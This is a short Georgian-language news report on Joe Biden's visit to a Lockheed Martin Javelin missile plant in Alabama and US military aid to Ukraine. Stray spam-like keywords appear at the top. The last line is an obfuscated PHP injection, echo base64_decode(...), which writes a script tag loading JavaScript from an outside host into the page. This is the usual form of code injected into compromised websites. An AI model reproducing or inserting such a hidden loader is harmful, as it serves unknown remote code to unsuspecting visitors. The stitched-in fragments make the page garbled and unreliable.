gorgia
ავერსი jaluzi
შეერთებული შტატების პრეზიდენტმა ჯო ბაიდენმა განაცხადა, რომ თუ დიქტატორებს არ შეეწინააღმდეგები, ისტორიამ გვაჩვენა, ისინი მოდიან, მათი მადა ძალაუფლების მიმართ იზრდება, - ამის შესახებ მან ალაბამას შტატში მდებარე იარაღის მწარმოებელ Lockheed Martin ქარხანაში სტუმრობისას განაცხადა.
 
მედიის ცნობით, აღნიშნულ ქარხანაში ტანკსაწინააღმდეგო ჯაველინის რაკეტებს აწარმოებენ, რომლებიც ერთ-ერთია იმ შეიარაღებიდან, რომელსაც ამერიკა უკრაინას აწვდის.
 
"ჩვენ დავრწმუნდით, რომ უკრაინაში აღჭურვილობის მიწოდება არ შეფერხდება. მას შემდეგ, რაც რუსეთი ორ თვეზე მეტი ხნის წინ უკრაინაში შეიჭრა, მარტო ჩვენ 3 მილიარდ დოლარზე მეტი ღირებულების უსაფრთხოების დახმარება გავუგზავნეთ უკრაინას. ეს არ ითვალისწინებს ჩვენი მოკავშირეების მიერ გაწეულ დახმარებას. ეს ფული პირდაპირი ინვესტიციაა თავად თავისუფლებისა და დემოკრატიის დასაცავად“, - განაცხადა თეთრი სახლის ლიდერმა.
 
842
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");